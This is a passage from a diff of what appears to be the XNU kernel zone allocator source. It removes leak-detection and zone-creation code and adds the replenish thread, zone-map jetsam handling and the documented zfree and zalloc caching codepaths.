priority VM privileged thread used to asynchronously refill a given zone. + * These are needed for data structures used by the lower level VM itself. The + * replenish thread maintains a reserve of elements, so that the VM will never + * block in the zone allocator. */ -__attribute__((noinline)) +__dead2 static void -zleak_free(uintptr_t addr, - vm_size_t allocation_size) +zone_replenish_thread(void *_z, wait_result_t __unused wr) { - if (addr == (uintptr_t) 0) { - return; + unsigned o_active, n_active; + zone_t z = _z; + + zone_lock(z); + assert(z->z_self == z); + assert(z->z_async_refilling && z->z_replenishes); + + zone_expand_locked(z, Z_WAITOK, zone_replenish_needed); + + if (z->z_replenish_wait) { + /* Wakeup any potentially throttled allocations */ + z->z_replenish_wait = false; + thread_wakeup(z); } - struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)]; + /* wakeup zone_reclaim() callers that were possibly waiting */ + os_atomic_rmw_loop(&zone_replenish_active, o_active, n_active, relaxed, { + if (os_sub_overflow(o_active, ZONE_REPLENISH_ACTIVE_INC, &n_active)) { + panic("zone_replenish_active corrupt: %d", o_active); + } + if ((n_active & ZONE_REPLENISH_ACTIVE_MASK) == 0) { + n_active = ZONE_REPLENISH_ACTIVE_NONE; + } + }); - /* Double-checked locking: check to find out if we're interested, lock, check to make - * sure it hasn't changed, then modify it, and release the lock. - */ + if (n_active == ZONE_REPLENISH_ACTIVE_NONE && + (o_active & ZONE_REPLENISH_ACTIVE_WAITER_BIT)) { + thread_wakeup(&zone_replenish_active); + } - if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) { - /* if the allocation was the one, grab the lock, check again, then delete it */ - lck_spin_lock(&zleak_lock); + z->z_async_refilling = false; + assert_wait(&z->z_elems_rsv, THREAD_UNINT); - if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) { - struct ztrace *trace; + zone_unlock(z); - /* allocation_size had better match what was passed into zleak_log - otherwise someone is freeing into the wrong zone! */ - if (allocation->za_size != allocation_size) { - panic("Freeing as size %lu memory that was allocated with size %lu\n", - (uintptr_t)allocation_size, (uintptr_t)allocation->za_size); - } + thread_block_parameter(zone_replenish_thread, z); + __builtin_unreachable(); +} - trace = &ztraces[allocation->za_trace_index]; +void +zone_replenish_configure(zone_t z) +{ + thread_t th; + kern_return_t kr; + char name[MAXTHREADNAMESIZE]; - /* size of 0 indicates trace bucket is unused */ - if (trace->zt_size > 0) { - trace->zt_size -= allocation_size; - } + zone_lock(z); + assert(!z->z_replenishes && !z->z_destructible); + z->z_elems_rsv = (uint16_t)(ZONE_REPLENISH_TARGET / zone_elem_size(z)); + z->z_replenishes = true; + os_atomic_add(&zone_replenish_active, ZONE_REPLENISH_ACTIVE_INC, relaxed); + z->z_async_refilling = true; + zone_unlock(z); - /* A NULL element means the allocation bucket is unused */ - allocation->za_element = 0; - } - lck_spin_unlock(&zleak_lock); + kr = kernel_thread_create(zone_replenish_thread, z, MAXPRI_KERNEL, &th); + if (kr != KERN_SUCCESS) { + panic("zone_replenish_configure, thread create: 0x%x", kr); } + /* make sure this thread can't lose its stack */ + assert(th->reserved_stack == th->kernel_stack); + + snprintf(name, sizeof(name), "z_replenish(%s)", zone_name(z)); + thread_set_thread_name(th, name); + + thread_mtx_lock(th); + th->options |= TH_OPT_VMPRIV | TH_OPT_ZONE_PRIV; + thread_start(th); + thread_mtx_unlock(th); + + thread_deallocate(th); } -#endif /* CONFIG_ZLEAKS */ +/*! @} */ +#endif /* !ZALLOC_TEST */ +#pragma mark zone jetsam integration +#if !ZALLOC_TEST -/* These functions outside of CONFIG_ZLEAKS because they are also used in - * mbuf.c for mbuf leak-detection. This is why they lack the z_ prefix. +/* + * We're being very conservative here and picking a value of 95%. We might need to lower this if + * we find that we're not catching the problem and are still hitting zone map exhaustion panics. */ +#define ZONE_MAP_JETSAM_LIMIT_DEFAULT 95 -/* "Thomas Wang's 32/64 bit mix functions." http://www.concentric.net/~Ttwang/tech/inthash.htm */ -uintptr_t -hash_mix(uintptr_t x) +/* + * Trigger zone-map-exhaustion jetsams if the zone map is X% full, where X=zone_map_jetsam_limit. + * Can be set via boot-arg "zone_map_jetsam_limit". Set to 95% by default. + */ +TUNABLE_WRITEABLE(unsigned int, zone_map_jetsam_limit, "zone_map_jetsam_limit", + ZONE_MAP_JETSAM_LIMIT_DEFAULT); + +void +get_zone_map_size(uint64_t *current_size, uint64_t *capacity) { -#ifndef __LP64__ - x += ~(x << 15); - x ^= (x >> 10); - x += (x << 3); - x ^= (x >> 6); - x += ~(x << 11); - x ^= (x >> 16); -#else - x += ~(x << 32); - x ^= (x >> 22); - x += ~(x << 13); - x ^= (x >> 8); - x += (x << 3); - x ^= (x >> 15); - x += ~(x << 27); - x ^= (x >> 31); -#endif - return x; + vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); + *current_size = ptoa_64(phys_pages); + *capacity = ptoa_64(zone_phys_mapped_max_pages); } -uint32_t -hashbacktrace(uintptr_t* bt, uint32_t depth, uint32_t max_size) +void +get_largest_zone_info(char *zone_name, size_t zone_name_len, uint64_t *zone_size) { - uintptr_t hash = 0; - uintptr_t mask = max_size - 1; + zone_t largest_zone = zone_find_largest(); - while (depth) { - hash += bt[--depth]; + /* + * Append kalloc heap name to zone name (if zone is used by kalloc) + */ + snprintf(zone_name, zone_name_len, "%s%s", + zone_heap_name(largest_zone), largest_zone->z_name); + + *zone_size = zone_size_wired(largest_zone); +} + +bool +zone_map_nearing_exhaustion(void) +{ + uint64_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed); + return phys_pages * 100 > zone_phys_mapped_max_pages * zone_map_jetsam_limit; +} + + +#define VMENTRY_TO_VMOBJECT_COMPARISON_RATIO 98 + +/* + * Tries to kill a single process if it can attribute one to the largest zone. If not, wakes up the memorystatus thread + * to walk through the jetsam priority bands and kill processes. + */ +static void +kill_process_in_largest_zone(void) +{ + pid_t pid = -1; + zone_t largest_zone = zone_find_largest(); + + printf("zone_map_exhaustion: Zone mapped %lld of %lld, used %lld, capacity %lld [jetsam limit %d%%]\n", + ptoa_64(os_atomic_load(&zones_phys_page_mapped_count, relaxed)), + ptoa_64(zone_phys_mapped_max_pages), + (uint64_t)zone_submaps_approx_size(), + (uint64_t)(zone_foreign_size() + zone_native_size()), + zone_map_jetsam_limit); + printf("zone_map_exhaustion: Largest zone %s%s, size %lu\n", zone_heap_name(largest_zone), + largest_zone->z_name, (uintptr_t)zone_size_wired(largest_zone)); + + /* + * We want to make sure we don't call this function from userspace. + * Or we could end up trying to synchronously kill the process + * whose context we're in, causing the system to hang. + */ + assert(current_task() == kernel_task); + + /* + * If vm_object_zone is the largest, check to see if the number of + * elements in vm_map_entry_zone is comparable. + * + * If so, consider vm_map_entry_zone as the largest. This lets us target + * a specific process to jetsam to quickly recover from the zone map + * bloat. + */ + if (largest_zone == vm_object_zone) { + unsigned int vm_object_zone_count = zone_count_allocated(vm_object_zone); + unsigned int vm_map_entry_zone_count = zone_count_allocated(vm_map_entry_zone); + /* Is the VM map entries zone count >= 98% of the VM objects zone count? */ + if (vm_map_entry_zone_count >= ((vm_object_zone_count * VMENTRY_TO_VMOBJECT_COMPARISON_RATIO) / 100)) { + largest_zone = vm_map_entry_zone; + printf("zone_map_exhaustion: Picking VM map entries as the zone to target, size %lu\n", + (uintptr_t)zone_size_wired(largest_zone)); + } + } + + /* TODO: Extend this to check for the largest process in other zones as well. */ + if (largest_zone == vm_map_entry_zone) { + pid = find_largest_process_vm_map_entries(); + } else { + printf("zone_map_exhaustion: Nothing to do for the largest zone [%s%s]. " + "Waking up memorystatus thread.\n", zone_heap_name(largest_zone), + largest_zone->z_name); } + if (!memorystatus_kill_on_zone_map_exhaustion(pid)) { + printf("zone_map_exhaustion: Call to memorystatus failed, victim pid: %d\n", pid); + } +} - hash = hash_mix(hash) & mask; - - assert(hash < max_size); +#endif /* !ZALLOC_TEST */ +#pragma mark zfree +#if !ZALLOC_TEST +#if KASAN_ZALLOC - return (uint32_t) hash; -} +/*! + * @defgroup zfree + * @{ + * + * @brief + * The codepath for zone frees. + * + * @discussion + * There are 4 major ways to allocate memory that end up in the zone allocator: + * - @c zfree() + * - @c zfree_percpu() + * - @c kfree*() + * - @c zfree_permanent() + * + * While permanent zones have their own allocation scheme, all other codepaths + * will eventually go through the @c zfree_ext() choking point. + * + * Ignoring the @c gzalloc_free() codepath, the decision tree looks like this: + * + * zfree_ext() + * ├───> zfree_cached() ────────────────╮ + * │ │ │ + * │ │ │ + * │ ├───> zfree_cached_slow() ───┤ + * │ │ │ │ + * │ │ v │ + * ╰───────┴───> zfree_item() ──────────┴───> + * + * + * @c zfree_ext() takes care of all the generic work to perform on an element + * before it is freed (zeroing, logging, tagging, ...) then will hand it off to: + * - @c zfree_item() if zone caching is off + * - @c zfree_cached() if zone caching is on. + * + * @c zfree_cached can take a number of decisions: + * - a fast path if the (f) or (a) magazines have space (preemption disabled), + * - using the cpu local or recirculation depot calling @c zfree_cached_slow(), + * - falling back to @c zfree_item() when CPU caching has been disabled. + */ /* - * TODO: Determine how well distributed this is - * max_size must be a power of 2. i.e 0x10000 because 0x10000-1 is 0x0FFFF which is a great bitmask + * Called from zfree() to add the element being freed to the KASan quarantine. + * + * Returns true if the newly-freed element made it into the quarantine without + * displacing another, false otherwise. In the latter case, addrp points to the + * address of the displaced element, which will be freed by the zone. */ -uint32_t -hashaddr(uintptr_t pt, uint32_t max_size) +static bool +kasan_quarantine_freed_element( + zone_t *zonep, /* the zone the element is being freed to */ + void **addrp) /* address of the element being freed */ { - uintptr_t hash = 0; - uintptr_t mask = max_size - 1; - - hash = hash_mix(pt) & mask; + zone_t zone = *zonep; + void *addr = *addrp; - assert(hash < max_size); + /* + * Resize back to the real allocation size and hand off to the KASan + * quarantine. `addr` may then point to a different allocation, if the + * current element replaced another in the quarantine. The zone then + * takes ownership of the swapped out free element. + */ + vm_size_t usersz = zone_elem_size(zone) - 2 * zone->z_kasan_redzone; + vm_size_t sz = usersz; - return (uint32_t) hash; + if (addr && zone->z_kasan_redzone) { + kasan_check_free((vm_address_t)addr, usersz, KASAN_HEAP_ZALLOC); + addr = (void *)kasan_dealloc((vm_address_t)addr, &sz); + assert(sz == zone_elem_size(zone)); + } + if (addr && !zone->kasan_noquarantine) { + kasan_free(&addr, &sz, KASAN_HEAP_ZALLOC, zonep, usersz, true); + if (!addr) { + return TRUE; + } + } + if (addr && zone->kasan_noquarantine) { + kasan_unpoison(addr, zone_elem_size(zone)); + } + *addrp = addr; + return FALSE; } -/* End of all leak-detection code */ -#pragma mark zone creation, configuration, destruction +#endif /* KASAN_ZALLOC */ -static zone_t -zone_init_defaults(zone_id_t zid) +__header_always_inline void +zfree_drop(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze, + bool recirc) { - zone_t z = &zone_array[zid]; - - z->page_count_max = ~0u; - z->collectable = true; - z->expandable = true; - z->submap_idx = Z_SUBMAP_IDX_GENERAL_MAP; + vm_offset_t esize = zone_elem_size(zone); - simple_lock_init(&z->lock, 0); + if (zone_meta_mark_free(meta, ze) == recirc) { + zone_meta_double_free_panic(zone, ze, __func__); + } - return z; -} + vm_offset_t old_size = meta->zm_alloc_size; + vm_offset_t max_size = ptoa(meta->zm_chunk_len) + ZM_ALLOC_SIZE_LOCK; + vm_offset_t new_size = zone_meta_alloc_size_sub(zone, meta, esize); -static bool -zone_is_initializing(zone_t z) -{ - return !z->z_self && !z->destroyed; + if (new_size == 0) { + /* whether the page was on the intermediate or all_used, queue, move it to free */ + zone_meta_requeue(zone, &zone->z_pageq_empty, meta); + zone->z_wired_empty += meta->zm_chunk_len; + } else if (old_size + esize > max_size) { + /* first free element on page, move from all_used */ + zone_meta_requeue(zone, &zone->z_pageq_partial, meta); + } } static void -zone_set_max(zone_t z, vm_size_t max) +zfree_item(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze) { -#if KASAN_ZALLOC - if (z->kasan_redzone) { - /* - * Adjust the max memory for the kasan redzones - */ - max += (max / z->pcpu_elem_size) * z->kasan_redzone * 2; - } -#endif - if (max < z->percpu ? 1 : z->alloc_pages) { - max = z->percpu ? 1 : z->alloc_pages; - } else { - max = atop(round_page(max)); - } - z->page_count_max = max; -} + /* transfer preemption count to lock */ + zone_lock_nopreempt_check_contention(zone, NULL); -void -zone_set_submap_idx(zone_t zone, unsigned int sub_map_idx) -{ - if (!zone_is_initializing(zone)) { - panic("%s: called after zone_create()", __func__); - } - if (sub_map_idx > zone_last_submap_idx) { - panic("zone_set_submap_idx(%d) > %d", sub_map_idx, zone_last_submap_idx); - } - zone->submap_idx = sub_map_idx; + zfree_drop(zone, meta, ze, false); + zone_elems_free_add(zone, 1); + + zone_unlock(zone); } -void -zone_set_noexpand( - zone_t zone, - vm_size_t max) +__attribute__((noinline)) +static void +zfree_cached_slow(zone_t zone, struct zone_page_metadata *meta, + zone_element_t ze, zone_cache_t cache) { - if (!zone_is_initializing(zone)) { - panic("%s: called after zone_create()", __func__); + struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags); + zone_magazine_t mag = NULL; + uint16_t n = 0; + + if (zone_meta_is_free(meta, ze)) { + zone_meta_double_free_panic(zone, ze, __func__); } - zone->expandable = false; - zone_set_max(zone, max); -} -void -zone_set_exhaustible( - zone_t zone, - vm_size_t max) -{ - if (!zone_is_initializing(zone)) { - panic("%s: called after zone_create()", __func__); + if (zone == zc_magazine_zone) { + mag = (zone_magazine_t)zone_element_addr(ze, + zone_elem_size(zone)); +#if KASAN_ZALLOC + kasan_poison_range((vm_offset_t)mag, zone_elem_size(zone), + ASAN_VALID); +#endif + } else { + mag = zone_magazine_alloc(Z_NOWAIT); + if (__improbable(mag == NULL)) { + return zfree_item(zone, meta, ze); + } + mag->zm_cur = 1; + mag->zm_elems[0] = ze; } - zone->expandable = false; - zone->exhaustible = true; - zone_set_max(zone, max); -} -/** - * @function zone_create_find - * - * @abstract - * Finds an unused zone for the given name and element size. - * - * @param name the zone name - * @param size the element size (including redzones, ...) - * @param flags the flags passed to @c zone_create* - * @param zid the desired zone ID or ZONE_ID_ANY - * - * @returns a zone to initialize further. - */ -static zone_t -zone_create_find( - const char *name, - vm_size_t size, - zone_create_flags_t flags, - zone_id_t zid) -{ - zone_id_t nzones; - zone_t z; + mag = zone_magazine_replace(&cache->zc_free_cur, + &cache->zc_free_elems, mag); - simple_lock(&all_zones_lock, &zone_locks_grp); + z_debug_assert(cache->zc_free_cur <= 1); + z_debug_assert(mag->zm_cur == zc_mag_size()); - nzones = (zone_id_t)os_atomic_load(&num_zones, relaxed); - assert(num_zones_in_use <= nzones && nzones < MAX_ZONES); + STAILQ_INSERT_HEAD(&mags, mag, zm_link); + n = 1; - if (__improbable(nzones < ZONE_ID__FIRST_DYNAMIC)) { + if (cache->zc_depot_max >= 2 * zc_mag_size()) { /* - * The first time around, make sure the reserved zone IDs - * have an initialized lock as zone_index_foreach() will - * enumerate them. + * If we can use the local depot (zc_depot_max allows for + * 2 magazines worth of elements) then: + * + * 1. if we have space for an extra depot locally, + * push it, and leave. + * + * 2. if we overflow, then take (1 / zc_recirc_denom) + * of the depot out, in order to migrate it to the + * recirculation depot. */ - while (nzones < ZONE_ID__FIRST_DYNAMIC) { - zone_init_defaults(nzones++); - } - - os_atomic_store(&num_zones, nzones, release); - } + zone_depot_lock_nopreempt(cache); - if (zid != ZONE_ID_ANY) { - if (zid >= ZONE_ID__FIRST_DYNAMIC) { - panic("zone_create: invalid desired zone ID %d for %s", - zid, name); + if ((cache->zc_depot_cur + 2) * zc_mag_size() <= + cache->zc_depot_max) { + cache->zc_depot_cur++; + STAILQ_INSERT_TAIL(&cache->zc_depot, mag, zm_link); + return zone_depot_unlock(cache); } - if (flags & ZC_DESTRUCTIBLE) { - panic("zone_create: ID %d (%s) must be permanent", zid, name); - } - if (zone_array[zid].z_self) { - panic("zone_create: creating zone ID %d (%s) twice", zid, name); + + while (zc_recirc_denom * cache->zc_depot_cur * zc_mag_size() >= + (zc_recirc_denom - 1) * cache->zc_depot_max) { + mag = STAILQ_FIRST(&cache->zc_depot); + STAILQ_REMOVE_HEAD(&cache->zc_depot, zm_link); + STAILQ_INSERT_TAIL(&mags, mag, zm_link); + cache->zc_depot_cur--; + n++; } - z = &zone_array[zid]; + + zone_depot_unlock(cache); } else { - if (flags & ZC_DESTRUCTIBLE) { - /* - * If possible, find a previously zdestroy'ed zone in the - * zone_array that we can reuse. - */ - for (int i = bitmap_first(zone_destroyed_bitmap, MAX_ZONES); - i >= 0; i = bitmap_next(zone_destroyed_bitmap, i)) { - z = &zone_array[i]; + enable_preemption(); + } - /* - * If the zone name and the element size are the - * same, we can just reuse the old zone struct. - */ - if (strcmp(z->z_name, name) || zone_elem_size(z) != size) { - continue; - } - bitmap_clear(zone_destroyed_bitmap, i); - z->destroyed = false; - z->z_self = z; - zid = (zone_id_t)i; - goto out; - } + /* + * Preflight validity of all the elements before we touch the zone + * metadata, and then insert them into the recirculation depot. + */ + STAILQ_FOREACH(mag, &mags, zm_link) { + for (uint16_t i = 0; i < zc_mag_size(); i++) { + zone_element_validate(zone, mag->zm_elems[i]); } + } - zid = nzones++; - z = zone_init_defaults(zid); + zone_lock_check_contention(zone, cache); - /* - * The release barrier pairs with the acquire in - * zone_index_foreach() and makes sure that enumeration loops - * always see an initialized zone lock. - */ - os_atomic_store(&num_zones, nzones, release); + STAILQ_FOREACH(mag, &mags, zm_link) { + for (uint16_t i = 0; i < zc_mag_size(); i++) { + zone_element_t e = mag->zm_elems[i]; + + if (!zone_meta_mark_free(zone_meta_from_element(e), e)) { + zone_meta_double_free_panic(zone, e, __func__); + } + } } + STAILQ_CONCAT(&zone->z_recirc, &mags); + zone->z_recirc_cur += n; -out: - num_zones_in_use++; - simple_unlock(&all_zones_lock); + zone_elems_free_add(zone, n * zc_mag_size()); - return z; + zone_unlock(zone); } -__abortlike static void -zone_create_panic(const char *name, const char *f1, const char *f2) +zfree_cached(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze) { - panic("zone_create: creating zone %s: flag %s and %s are incompatible", - name, f1, f2); -} -#define zone_create_assert_not_both(name, flags, current_flag, forbidden_flag) \ - if ((flags) & forbidden_flag) { \ - zone_create_panic(name, #current_flag, #forbidden_flag); \ + zone_cache_t cache = zpercpu_get(zone->z_pcpu_cache); + + if (cache->zc_free_cur >= zc_mag_size()) { + if (cache->zc_alloc_cur >= zc_mag_size()) { + return zfree_cached_slow(zone, meta, ze, cache); + } + zone_cache_swap_magazines(cache); + } + + if (__improbable(cache->zc_alloc_elems == NULL)) { + return zfree_item(zone, meta, ze); + } + + if (zone_meta_is_free(meta, ze)) { + zone_meta_double_free_panic(zone, ze, __func__); + } + + uint16_t idx = cache->zc_free_cur++; + if (idx >= zc_mag_size()) { + zone_accounting_panic(zone, "zc_free_cur overflow"); } + cache->zc_free_elems[idx] = ze; + + enable_preemption(); +} /* - * Adjusts the size of the element based on minimum size, alignment - * and kasan redzones + * The function is noinline when zlog can be used so that the backtracing can + * reliably skip the zfree_ext() and zfree_log_trace() + * boring frames. */ -static vm_size_t -zone_elem_adjust_size( - const char *name __unused, - vm_size_t elem_size, - zone_create_flags_t flags, - vm_size_t *redzone __unused) +#if ZONE_ENABLE_LOGGING +__attribute__((noinline)) +#endif /* ZONE_ENABLE_LOGGING */ +void +zfree_ext(zone_t zone, zone_stats_t zstats, void *addr) { - vm_size_t size; + struct zone_page_metadata *page_meta; + vm_offset_t elem = (vm_offset_t)addr; + vm_size_t elem_size = zone_elem_size(zone); + zone_element_t ze; + + DTRACE_VM2(zfree, zone_t, zone, void*, addr); + TRACE_MACHLEAKS(ZFREE_CODE, ZFREE_CODE_2, elem_size, elem); +#if VM_MAX_TAG_ZONES + if (__improbable(zone->tags)) { + vm_tag_t tag = *ztSlot(zone, elem) >> 1; + // set the tag with b0 clear so the block remains inuse + *ztSlot(zone, elem) = 0xFFFE; + vm_tag_update_zone_size(tag, zone->tag_zone_index, + -(long)elem_size); + } +#endif /* VM_MAX_TAG_ZONES */ + +#if KASAN_ZALLOC + if (kasan_quarantine_freed_element(&zone, &addr)) { + return; + } + /* + * kasan_quarantine_freed_element() might return a different + * {zone, addr} than the one being freed for kalloc heaps. + * + * Make sure we reload everything. + */ + elem = (vm_offset_t)addr; + elem_size = zone_elem_size(zone); +#endif +#if CONFIG_ZLEAKS /* - * Adjust element size for minimum size and pointer alignment + * Zone leak detection: un-track the allocation */ - size = (elem_size + sizeof(vm_offset_t) - 1) & -sizeof(vm_offset_t); - if (((flags & ZC_PERCPU) == 0) && size < ZONE_MIN_ELEM_SIZE) { - size = ZONE_MIN_ELEM_SIZE; + if (__improbable(zone->zleak_on)) { + zleak_free(elem, elem_size); + } +#endif /* CONFIG_ZLEAKS */ +#if ZONE_ENABLE_LOGGING + if (__improbable(DO_LOGGING(zone))) { + zfree_log_trace(zone, elem, __builtin_frame_address(0)); + } +#endif /* ZONE_ENABLE_LOGGING */ +#if CONFIG_GZALLOC + if (__improbable(zone->gzalloc_tracked)) { + return gzalloc_free(zone, zstats, addr); } +#endif /* CONFIG_GZALLOC */ + page_meta = zone_element_resolve(zone, elem, elem_size, &ze); + ze.ze_value |= zfree_clear_or_poison(zone, elem, elem_size); #if KASAN_ZALLOC - /* - * Expand the zone allocation size to include the redzones. - * - * For page-multiple zones add a full guard page because they - * likely require alignment. - */ - vm_size_t redzone_tmp; - if (flags & (ZC_KASAN_NOREDZONE | ZC_PERCPU)) { - redzone_tmp = 0; - } else if ((size & PAGE_MASK) == 0) { - if (size != PAGE_SIZE && (flags & ZC_ALIGNMENT_REQUIRED)) { - panic("zone_create: zone %s can't provide more than PAGE_SIZE" - "alignment", name); + if (zone->z_percpu) { + zpercpu_foreach_cpu(i) { + kasan_poison_range(elem + ptoa(i), elem_size, + ASAN_HEAP_FREED); } - redzone_tmp = PAGE_SIZE; - } else if (flags & ZC_ALIGNMENT_REQUIRED) { - redzone_tmp = 0; } else { - redzone_tmp = KASAN_GUARD_SIZE; - } - size += redzone_tmp * 2; - if (redzone) { - *redzone = redzone_tmp; + kasan_poison_range(elem, elem_size, ASAN_HEAP_FREED); } #endif - return size; + + disable_preemption(); + zpercpu_get(zstats)->zs_mem_freed += elem_size; + + if (zone->z_pcpu_cache) { + return zfree_cached(zone, page_meta, ze); + } + + return zfree_item(zone, page_meta, ze); } -/* - * Returns the allocation chunk size that has least framentation - */ -static vm_size_t -zone_get_min_alloc_granule( - vm_size_t elem_size, - zone_create_flags_t flags) +void +(zfree)(union zone_or_view zov, void *addr) { - vm_size_t alloc_granule = PAGE_SIZE; - if (flags & ZC_PERCPU) { - alloc_granule = PAGE_SIZE * zpercpu_count(); - if (PAGE_SIZE % elem_size > 256) { - panic("zone_create: per-cpu zone has too much fragmentation"); - } - } else if ((elem_size & PAGE_MASK) == 0) { - /* zero fragmentation by definition */ - alloc_granule = elem_size; - } else if (alloc_granule % elem_size == 0) { - /* zero fragmentation by definition */ - } else { - vm_size_t frag = (alloc_granule % elem_size) * 100 / alloc_granule; - vm_size_t alloc_tmp = PAGE_SIZE; - while ((alloc_tmp += PAGE_SIZE) <= ZONE_MAX_ALLOC_SIZE) { - vm_size_t frag_tmp = (alloc_tmp % elem_size) * 100 / alloc_tmp; - if (frag_tmp < frag) { - frag = frag_tmp; - alloc_granule = alloc_tmp; - } - } - } - return alloc_granule; + zone_t zone = zov.zov_view->zv_zone; + zone_stats_t zstats = zov.zov_view->zv_stats; + assert(!zone->z_percpu); + zfree_ext(zone, zstats, addr); } -vm_size_t -zone_get_foreign_alloc_size( - const char *name __unused, - vm_size_t elem_size, - zone_create_flags_t flags, - uint16_t min_pages) +void +zfree_percpu(union zone_or_view zov, void *addr) { - vm_size_t adjusted_size = zone_elem_adjust_size(name, elem_size, flags, - NULL); - vm_size_t alloc_granule = zone_get_min_alloc_granule(adjusted_size, - flags); - vm_size_t min_size = min_pages * PAGE_SIZE; - /* - * Round up min_size to a multiple of alloc_granule - */ - return ((min_size + alloc_granule - 1) / alloc_granule) - * alloc_granule; + zone_t zone = zov.zov_view->zv_zone; + zone_stats_t zstats = zov.zov_view->zv_stats; + assert(zone->z_percpu); + zfree_ext(zone, zstats, (void *)__zpcpu_demangle(addr)); } -zone_t -zone_create_ext( - const char *name, - vm_size_t size, - zone_create_flags_t flags, - zone_id_t desired_zid, - void (^extra_setup)(zone_t)) +/*! @} */ +#endif /* !ZALLOC_TEST */ +#pragma mark zalloc +#if !ZALLOC_TEST + +/*! + * @defgroup zalloc + * @{ + * + * @brief + * The codepath for zone allocations. + * + * @discussion + * There are 4 major ways to allocate memory that end up in the zone allocator: + * - @c zalloc(), @c zalloc_flags(), ... + * - @c zalloc_percpu() + * - @c kalloc*() + * - @c zalloc_permanent() + * + * While permanent zones have their own allocation scheme, all other codepaths + * will eventually go through the @c zalloc_ext() choking point. + * + * Ignoring the @c zalloc_gz() codepath, the decision tree looks like this: + * + * zalloc_ext() + * │ + * ├───> zalloc_cached() ──────> zalloc_cached_fast() ───╮ + * │ │ ^ │ + * │ │ │ │ + * │ ╰───> zalloc_cached_slow() ───╯ │ + * │ │ │ + * │<─────────────────╮ ├─────────────╮ │ + * │ │ │ │ │ + * │ │ v │ │ + * │<───────╮ ╭──> zalloc_item_slow() ────┤ │ + * │ │ │ │ │ + * │ │ │ v │ + * ╰───> zalloc_item() ──────────> zalloc_item_fast() ───┤ + * │ + * v + * zalloc_return() + * + * + * + * The @c zalloc_item() track is used when zone caching is off: + * - @c zalloc_item_fast() is used when there are enough elements available, + * - @c zalloc_item_slow() is used when a refill is needed, which can cause + * the zone to grow. This is the only codepath that refills. + * + * This track uses the zone lock for serialization: + * - taken in @c zalloc_item(), + * - maintained during @c zalloc_item_slow() (possibly dropped and re-taken), + * - dropped in @c zalloc_item_fast(). + * + * + * The @c zalloc_cached() track is used when zone caching is on: + * - @c zalloc_cached_fast() is taken when the cache has elements, + * - @c zalloc_cached_slow() is taken if a cache refill is needed. + * It can chose many strategies: + * ~ @c zalloc_cached_from_depot() to try to reuse cpu stashed magazines, + * ~ using the global recirculation depot @c z_recirc, + * ~ using zalloc_import() if the zone has enough elements, + * ~ falling back to the @c zalloc_item() track if zone caching is disabled + * due to VM pressure or the zone has no available elements. + * + * This track disables preemption for serialization: + * - preemption is disabled in @c zalloc_cached(), + * - kept disabled during @c zalloc_cached_slow(), converted into a zone lock + * if switching to @c zalloc_item_slow(), + * - preemption is reenabled in @c zalloc_cached_fast(). + * + * @c zalloc_cached_from_depot() also takes depot locks (taken by the caller, + * released by @c zalloc_cached_from_depot(). + * + * In general the @c zalloc_*_slow() codepaths deal with refilling and will + * tail call into the @c zalloc_*_fast() code to perform the actual allocation. + * + * @c zalloc_return() is the final function everyone tail calls into, + * which prepares the element for consumption by the caller and deals with + * common treatment (zone logging, tags, kasan, validation, ...). + */ + +/*! + * @function zalloc_import + * + * @brief + * Import @c n elements in the specified array, opposite of @c zfree_drop(). + * + * @param zone The zone to import elements from + * @param elems The array to import into + * @param n The number of elements to import. Must be non zero, + * and smaller than @c zone->z_elems_free. + */ +__header_always_inline void +zalloc_import(zone_t zone, zone_element_t *elems, uint32_t n) { - vm_size_t alloc; - vm_size_t redzone; - zone_t z; + vm_size_t esize = zone_elem_size(zone); + uint32_t i = 0; - if (size > ZONE_MAX_ALLOC_SIZE) { - panic("zone_create: element size too large: %zd", (size_t)size); - } + assertf(STAILQ_EMPTY(&zone->z_recirc), + "Trying to import from zone %p [%s%s] with non empty recirc", + zone, zone_heap_name(zone), zone_name(zone)); - size = zone_elem_adjust_size(name, size, flags, &redzone); - /* - * Allocate the zone slot, return early if we found an older match. - */ - z = zone_create_find(name, size, flags, desired_zid); - if (__improbable(z->z_self)) { - /* We found a zone to reuse */ - return z; - } + do { + vm_offset_t page, eidx, size = 0; + struct zone_page_metadata *meta; + + if (!zone_pva_is_null(zone->z_pageq_partial)) { + meta = zone_pva_to_meta(zone->z_pageq_partial); + page = zone_pva_to_addr(zone->z_pageq_partial); + } else if (!zone_pva_is_null(zone->z_pageq_empty)) { + meta = zone_pva_to_meta(zone->z_pageq_empty); + page = zone_pva_to_addr(zone->z_pageq_empty); + zone_counter_sub(zone, z_wired_empty, meta->zm_chunk_len); + } else { + zone_accounting_panic(zone, "z_elems_free corruption"); + } - /* - * Initialize the zone properly. - */ + if (!zone_has_index(zone, meta->zm_index)) { + zone_page_metadata_index_confusion_panic(zone, page, meta); + } - /* - * If the kernel is post lockdown, copy the zone name passed in. - * Else simply maintain a pointer to the name string as it can only - * be a core XNU zone (no unloadable kext exists before lockdown). - */ - if (startup_phase >= STARTUP_SUB_LOCKDOWN) { - size_t nsz = MIN(strlen(name) + 1, MACH_ZONE_NAME_MAX_LEN); - char *buf = zalloc_permanent(nsz, ZALIGN_NONE); - strlcpy(buf, name, nsz); - z->z_name = buf; + vm_offset_t old_size = meta->zm_alloc_size; + vm_offset_t max_size = ptoa(meta->zm_chunk_len) + ZM_ALLOC_SIZE_LOCK; + + do { + eidx = zone_meta_find_and_clear_bit(zone, meta); + elems[i++] = zone_element_encode(page, eidx, ZPM_AUTO); + size += esize; + } while (i < n && old_size + size + esize <= max_size); + + vm_offset_t new_size = zone_meta_alloc_size_add(zone, meta, size); + + if (new_size + esize > max_size) { + zone_meta_requeue(zone, &zone->z_pageq_full, meta); + } else if (old_size == 0) { + /* remove from free, move to intermediate */ + zone_meta_requeue(zone, &zone->z_pageq_partial, meta); + } + } while (i < n); +} + +/*! + * @function zalloc_return + * + * @brief + * Performs the tail-end of the work required on allocations before the caller + * uses them. + * + * @discussion + * This function is called without any zone lock held, + * and preemption back to the state it had when @c zalloc_ext() was called. + * + * @param zone The zone we're allocating from. + * @param ze The encoded element we just allocated. + * 